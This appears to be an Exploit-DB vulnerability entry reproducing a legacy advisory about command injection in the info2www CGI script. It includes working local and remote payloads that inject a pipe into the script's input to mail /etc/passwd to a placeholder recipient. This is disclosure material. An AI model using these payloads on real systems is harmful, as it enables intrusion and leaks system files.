https://www.exploit-db.com/exploits/20430
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199803-003

Theinfo2wwwCGI脚本存在漏洞。该漏洞允许远程访问文件或远程执行命令。

source: http://www.securityfocus.com/bid/1995/info

The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. 

Locally:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
$
You have new mail.
$

Remotely:
http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)

来源:BID
名称:1995
链接:http://www.securityfocus.com/bid/1995